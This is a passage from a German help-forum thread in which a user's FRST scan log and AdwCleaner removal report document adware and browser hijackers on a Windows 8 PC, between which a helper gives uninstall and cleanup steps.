Toolbar: HKLM-x32 - GMX MailCheck - {C424171E-592A-415a-9EB1-DFD6D95D3530} - C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-23] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-29] (McAfee, Inc.)
Handler: gmx - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler-x32: gmx - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-23] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-29] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2012-05-14] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2012-05-14] (McAfee, Inc.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
FireFox:
========
FF ProfilePath: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF NewTab: chrome://quick_start/content/index.html
FF DefaultSearchEngine: yessearches
FF DefaultSearchEngine.US: data:text/plain,browser.search.defaultenginename.US=yessearches
FF SelectedSearchEngine: yoursearching
FF Homepage: search.mpc.am
FF Keyword.URL: hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&q=
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2012-05-14] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\progra~2\mcafee\msc\npmcsn~1.dll [2012-05-14] ()
FF user.js: detected! => C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\user.js [2016-02-06]
FF user.js: detected! => C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\user.js [2016-02-06]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\istartpageing.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\smod.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\yoursearching.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\DD1B66D4.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\istartpageing.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\yoursearching.xml [2016-01-31]
FF Extension: FirefixTab - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\deskCutv2@gmail.com [2016-01-31] [ist nicht signiert]
FF Extension: YahooToolsProtected - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\yahooprotected@gmail.com [2016-01-31] [ist nicht signiert]
FF Extension: FirefixTab - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\deskCutv2@gmail.com [2016-01-31] [ist nicht signiert]
FF Extension: YahooToolsProtected - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\yahooprotected@gmail.com [2016-01-31] [ist nicht signiert]
FF HKLM\...\Firefox\Extensions: [{F64D5F15-81C2-4573-814A-31A0BF41A433}] - C:\Program Files\shopperz010220161759\Firefox\{F64D5F15-81C2-4573-814A-31A0BF41A433}.xpi => nicht gefunden
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Firefox\Extensions: [deskCutv2@gmail.com] - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com
FF HKLM-x32\...\Firefox\Extensions: [yahooprotected@gmail.com] - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\yahooprotected@gmail.com
FF HKLM-x32\...\Firefox\Extensions: [{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}] - C:\WINDOWS\Installer\{40E468DE-4F96-445E-98FD-B843B650E95B}\{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}.xpi
FF Extension: Download Protect - C:\WINDOWS\Installer\{40E468DE-4F96-445E-98FD-B843B650E95B}\{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}.xpi [2016-01-31]
FF HKLM-x32\...\Firefox\Extensions: [{F64D5F15-81C2-4573-814A-31A0BF41A433}] - C:\Program Files\shopperz010220161759\Firefox\{F64D5F15-81C2-4573-814A-31A0BF41A433}.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{1FEC24E4-4517-4ECE-802C-F57D4F53A8E1}] - C:\WINDOWS\Installer\{E3E74DF8-7DCB-4837-976C-49D4AA90DE6B}\{1FEC24E4-4517-4ECE-802C-F57D4F53A8E1}.xpi
FF Extension: Download Protect - C:\WINDOWS\Installer\{E3E74DF8-7DCB-4837-976C-49D4AA90DE6B}\{1FEC24E4-4517-4ECE-802C-F57D4F53A8E1}.xpi [2016-02-06]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2016-01-31] [ist nicht signiert]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\!FCD01E059CED5F6D5A56ED297FC9FBBCFCD0.js [2016-01-31] <==== ACHTUNG
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\FCD01E059CED5F6D5A56ED297FC9FBBCFCD0 [2016-01-31] <==== ACHTUNG
Chrome:
=======
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-02-06]
CHR HKU\S-1-5-21-2229505580-413648313-3343944023-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-02-06]
|
|
07.02.2016, 15:14
| #5 | |
| /// TB-Ausbilder /// Anleitungs-Guru | Windows 8.x mit einer großen Auswahl an Schädlingen Hi, Schritt 1 Bitte deinstalliere folgende Programme: BoBrowser Body Text Feathering BubbleSound DNS Unlocker version 1.4 GamesDesktop 014.005010223 GamesDesktop 014.005010228 Games-desktop Maintenance 014.184 Max Driver Updater Satellite Comma Search Protect SearchModule Setup shopperz SpaceSoundPro SpaceSoundPro Service SVH Update for PriceFountain yoursearching uninstall Versuche es bei Windows 8  mit der Windowstaste + X über  .Sollte das nicht gehen, lade Dir bitte Revo Uninstaller  hier herunter. Entpacke die zip-Datei auf den Desktop. Anleitung
Wenn Du ein Programm nicht deinstallieren kannst, mach mit dem nächsten weiter. Auch wenn am Ende noch Programme übrig geblieben sind, führe den nächsten Schritt aus: Schritt 2 Downloade Dir bitte  AdwCleaner auf deinen Desktop.
Schritt 3  
Schritt 4 Download von  ZOEK (by Smeenk)
Schritt 5 Bitte starte FRST erneut, markiere auch die checkbox  und drücke auf Untersuchen. Bitte poste mir den Inhalt der beiden Logs die erstellt werden.
__________________ Gruß deeprybka  Lob, Kritik, Wünsche? Spende fürs trojaner-board? _______________________________________________ „Neminem laede, immo omnes, quantum potes, iuva.“ Arthur Schopenhauer |
|
08.02.2016, 00:34
| #6 |
| | Windows 8.x mit einer großen Auswahl an Schädlingen AdwCleaner C1 Code:
ATTFilter # AdwCleaner v5.032 - Bericht erstellt am 07/02/2016 um 22:36:28
# Aktualisiert am 31/01/2016 von Xplode
# Datenbank : 2016-02-07.2 [Server]
# Betriebssystem : Windows 8 (x64)
# Benutzername : Manz - HAUS
# Gestartet von : E:\AdwCleaner_5.032.exe
# Option : Löschen
# Unterstützung : hxxp://toolslib.net/forum
***** [ Dienste ] *****
[-] Dienst Gelöscht : cherimoya
[-] Dienst Gelöscht : ClaraUpdater
[-] Dienst Gelöscht : SSFK
[-] Dienst Gelöscht : DnsBlockUpdateSvc
[-] Dienst Gelöscht : MPCProtectService
[-] Dienst Gelöscht : WdMan
[-] Dienst Gelöscht : MPCKpt
[-] Dienst Gelöscht : nekydufizbt
[-] Dienst Gelöscht : qigypevozbt
[-] Dienst Gelöscht : wucotusy
[-] Dienst Gelöscht : zutuzuni
***** [ Ordner ] *****
[-] Ordner Gelöscht : C:\Program Files\SOUND+
[-] Ordner Gelöscht : C:\Program Files\{05EB6F99-463B-44CA-93A7-7C57786E2569}
[-] Ordner Gelöscht : C:\Program Files\{BBA6D671-3BA2-4BBC-9A9A-4C748AD4901E}
[-] Ordner Gelöscht : C:\Program Files\{BC760D76-4920-48C3-A3DD-6689681D1D92}
[-] Ordner Gelöscht : C:\Program Files\shopperz010220161759
[#] Ordner Gelöscht : C:\Program Files (x86)\MPC Cleaner
[-] Ordner Gelöscht : C:\Program Files (x86)\Professional Cleaning Software
[-] Ordner Gelöscht : C:\Program Files (x86)\QuickSearch
[-] Ordner Gelöscht : C:\Program Files (x86)\SecurityUtility
[-] Ordner Gelöscht : C:\Program Files (x86)\SFK
[-] Ordner Gelöscht : C:\Program Files (x86)\SearchesToYesbnd
[-] Ordner Gelöscht : C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275
[-] Ordner Gelöscht : C:\Program Files (x86)\B5B53C54-1454247040-E111-8F5D-B888E3A0B275
[-] Ordner Gelöscht : C:\Program Files (x86)\B5B53C54-1454872248-E111-8F5D-B888E3A0B275
[-] Ordner Gelöscht : C:\Program Files (x86)\Super Great
[-] Ordner Gelöscht : C:\Program Files (x86)\{6E5909E8-3B98-4878-BF84-218A47B5BDBE}
[-] Ordner Gelöscht : C:\Program Files (x86)\{81124F8F-D6AB-4912-9F8D-54DC4E6DDE56}
[-] Ordner Gelöscht : C:\Program Files (x86)\{FC83B1F4-FC2A-4AED-BF32-D1F007D9AB1D}
[-] Ordner Gelöscht : C:\Program Files (x86)\rec_en_77
[-] Ordner Gelöscht : C:\Program Files (x86)\SpaceSondPro_v53.12571
[-] Ordner Gelöscht : C:\Program Files (x86)\Common Files\ClaraUpdater
[-] Ordner Gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\BoBrowser
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\BrowserAir
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\DnsBlock
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\ext_funfeedr
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\Professional_Cleaning_Sof
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\B5B53C54-1454273619-E111-8F5D-B888E3A0B275
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\B5B53C54-1454875958-E111-8F5D-B888E3A0B275
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\B5B53C54-1454881735-E111-8F5D-B888E3A0B275
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\Temp\APN-Stub
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\Temp\MPC
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\Temp\Super Great
[-] Ordner Gelöscht : C:\Users\Manz\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\ASPackage
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Genius
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\istartpageing
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\PriceFountain
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Systweak
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BrowserAir
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Professional Cleaning Software
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\deskCutv2@gmail.com
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\yahooprotected@gmail.com
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\deskCutv2@gmail.com
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\yahooprotected@gmail.com
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\Extensions\deskCutv2@gmail.com
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\Extensions\yahooprotected@gmail.com
[-] Ordner Gelöscht : C:\Users\Manz\Documents\ProfessionalCleaningSoftware
[-] Ordner Gelöscht : C:\WINDOWS\Installer\{15BE6350-F697-486F-9D42-AEB6331C3B6D}
[-] Ordner Gelöscht : C:\WINDOWS\Installer\{386CE530-7A1F-4930-B6A0-12C686CC9468}
[-] Ordner Gelöscht : C:\WINDOWS\Installer\{40E468DE-4F96-445E-98FD-B843B650E95B}
[-] Ordner Gelöscht : C:\WINDOWS\Installer\{509E29BD-7FB8-4358-843B-6873FB59B15D}
[#] Ordner Gelöscht : C:\WINDOWS\SysNative\Tasks\Genius
***** [ Dateien ] *****
[-] Datei Gelöscht : C:\END
[-] Datei Gelöscht : C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
[-] Datei Gelöscht : C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_www.palikan.com_0.localstorage
[-] Datei Gelöscht : C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_www.palikan.com_0.localstorage-journal
[-] Datei Gelöscht : C:\Users\Manz\AppData\Local\Temp\lengine.ini.log
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\BrowserAir.lnk
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BoBrowser.lnk
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BrowserAir.lnk
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\user.js
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\istartpageing.xml
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\yoursearching.xml
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\user.js
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\smod.xml
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\istartpageing.xml
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\yoursearching.xml
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\user.js
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\searchplugins\istartpageing.xml
[-] Datei Gelöscht : C:\Users\Manz\Desktop\Facebook.lnk
[-] Datei Gelöscht : C:\Users\Manz\Desktop\Youtube.lnk
[-] Datei Gelöscht : C:\Users\Manz\Desktop\BrowserAir.lnk
[-] Datei Gelöscht : C:\Users\Manz\Desktop\Sound+.lnk
[-] Datei Gelöscht : C:\Users\Public\Desktop\MPC Cleaner.lnk
[-] Datei Gelöscht : C:\WINDOWS\SysNative\roboot64.exe
[-] Datei Gelöscht : C:\WINDOWS\SysNative\DnsBlockUpdateSvc.exe
[-] Datei Gelöscht : C:\WINDOWS\SysNative\dns.block
[-] Datei Gelöscht : C:\WINDOWS\SysNative\GroupPolicy\Machine\Registry.pol
[-] Datei Gelöscht : C:\WINDOWS\SysNative\GroupPolicy\GPT.ini
[-] Datei Gelöscht : C:\WINDOWS\SysNative\drivers\cherimoya.sys
[-] Datei Gelöscht : C:\WINDOWS\SysNative\drivers\MPCKpt.sys
[-] Datei Gelöscht : C:\WINDOWS\SysNative\drivers\sdfhgdf.sys
[-] Datei Gelöscht : C:\WINDOWS\SysWOW64\dns.block
[-] Datei Gelöscht : C:\WINDOWS\SysWOW64\lavasofttcpservice.dll
[-] Datei Gelöscht : C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini
***** [ DLLs ] *****
[-] Datei Desinfiziert : C:\WINDOWS\SysNative\dnsapi.dll
[-] Datei Desinfiziert : C:\WINDOWS\SysWOW64\dnsapi.dll
***** [ Verknüpfungen ] *****
***** [ Aufgabenplanung ] *****
[-] Geplante Aufgabe Gelöscht : Run_Bobby_Browser
[-] Geplante Aufgabe Gelöscht : Go_Palikan
[-] Geplante Aufgabe Gelöscht : crash_service
[-] Geplante Aufgabe Gelöscht : runTask
[-] Geplante Aufgabe Gelöscht : updateTask
[-] Geplante Aufgabe Gelöscht : IBUpd
[-] Geplante Aufgabe Gelöscht : Genius
[-] Geplante Aufgabe Gelöscht : Genius_Interval
[-] Geplante Aufgabe Gelöscht : ProfessionalCleaningSoftware_Popup
[-] Geplante Aufgabe Gelöscht : ProfessionalCleaningSoftware_Start
[-] Geplante Aufgabe Gelöscht : IBUpd2
[-] Geplante Aufgabe Gelöscht : Security Utility Updater
[-] Geplante Aufgabe Gelöscht : Security Utility Updater
***** [ Registrierungsdatenbank ] *****
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\bobrowser.exe
[-] Schlüssel Gelöscht : HKCU\Software\Mozilla\Extends
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\DPBHO.DLL
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\MediaPlayer\ShimInclusionList\bobrowser.exe
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\MediaPlayer\ShimInclusionList\BrowserAir.exe
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\A7BD54B233B5B2F70AF86F5BD1A0C0A772A59FC6
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\D830B6B8939ACB4928401060203BB648456BB4F8
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\F53E693DDABF57A88A9B12B608B09B26C0608B74
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ProfessionalCleaningSoftware.exe
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
[-] Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [gmsd_de_005010223]
[-] Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [rec_en_77]
[-] Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [rec_de_184]
[-] Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [gmsd_de_005010228]
[-] Wert Gelöscht : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [deskCutv2@gmail.com]
[-] Wert Gelöscht : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [yahooprotected@gmail.com]
[-] Wert Gelöscht : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [{C3CD68D2-6088-4E72-BDE2-DE30DFFF4239}]
[-] Wert Gelöscht : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}]
[-] Schlüssel Gelöscht : HKCU\Software\Google\Chrome\Extensions\jlcgehabolcakkjhgmgpkagpolbjlhfa
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{425F4ABF-B8E4-402D-9E49-06E494EB8DBF}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{1C6F51F8-BCE6-4702-8952-6A8233359FBC}
[-] Schlüssel Gelöscht : HKCU\Software\Classes\CLSID\{17EF1FFB-0545-4C9A-BE64-78FF53338475}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{C424171E-592A-415A-9EB1-DFD6D95D3530}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{11B16A3D-F03E-4565-A532-E66B219C9B0E}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{11B16A3D-F03E-4565-A532-E66B219C9B03}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{8FF10FED-2F0A-4F7F-BE87-B04F1DCD4319}
[!] Schlüssel Nicht Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{F2DB3739-77FB-41EB-9ED3-ABF34DF2DBF7}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{296E49AA-76AE-4392-8145-A06733310DF1}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{7307C0C7-347E-48DD-BF91-F8E74D3FE764}
[!] Schlüssel Nicht Gelöscht : HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[!] Schlüssel Nicht Gelöscht : HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{E7BF74EE-9106-4113-B216-2F980BA29141}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
[!] Schlüssel Nicht Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{CC5E6338-EB1B-4E46-8271-E691F9096452}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11B16A3D-F03E-4565-A532-E66B219C9B03}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C424171E-592A-415A-9EB1-DFD6D95D3530}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{11B16A3D-F03E-4565-A532-E66B219C9B03}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C424171E-592A-415A-9EB1-DFD6D95D3530}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{11B16A3D-F03E-4565-A532-E66B219C9B03}
[-] Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}]
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C424171E-592A-415A-9EB1-DFD6D95D3530}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{C424171E-592A-415A-9EB1-DFD6D95D3530}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{F2DB3739-77FB-41EB-9ED3-ABF34DF2DBF7}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{296E49AA-76AE-4392-8145-A06733310DF1}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{7307C0C7-347E-48DD-BF91-F8E74D3FE764}
[!] Schlüssel Nicht Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[!] Schlüssel Nicht Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C424171E-592A-415A-9EB1-DFD6D95D3530}
[-] Schlüssel Gelöscht : HKCU\Software\BrowserAir
[-] Schlüssel Gelöscht : HKCU\Software\DAILYPCCLEAN
